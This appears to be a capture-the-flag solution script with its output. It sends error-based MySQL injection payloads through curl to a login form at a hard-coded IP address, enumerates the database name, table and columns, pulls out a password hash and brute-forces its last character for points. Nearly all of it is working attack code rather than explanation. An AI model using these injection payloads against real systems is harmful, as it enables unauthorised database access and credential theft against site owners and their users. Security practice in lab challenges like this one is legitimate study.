sqli() {
  curl -sd "username=x' $1 #" -d 'password=x' 'http://137.226.161.222:8000/advsql';
}

filter() {
  H=$(grep "~'" |egrep -o "~'[0-9a-f]*" |sed "s/~'//")
  python -c 'print "'$H'".decode("hex")'
}

sqli 'and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(schema_name as char)),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)' |filter
advexpl

sqli 'and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x6164766578706c limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)' |filter
users

sqli 'and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(column_name as char)),0x27,0x7e) FROM information_schema.columns Where table_schema=0x6164766578706c AND table_name=0x7573657273 limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)' |filter
username

sqli 'and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(column_name as char)),0x27,0x7e) FROM information_schema.columns Where table_schema=0x6164766578706c AND table_name=0x7573657273 limit 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)' |filter
password

sqli 'and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,Hex(cast(users.password as char)),0x27,0x7e) FROM `advexpl`.users LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)' |filter
c59519f776d0d4ebd0827dee533245b

# for i in {0..9} a b c d e f; do echo $i; validate c59519f776d0d4ebd0827dee533245b$i; done
b
        <p>Congratulations, you scored 400 points!</p>

there was also the ExtractValue() method, much simpler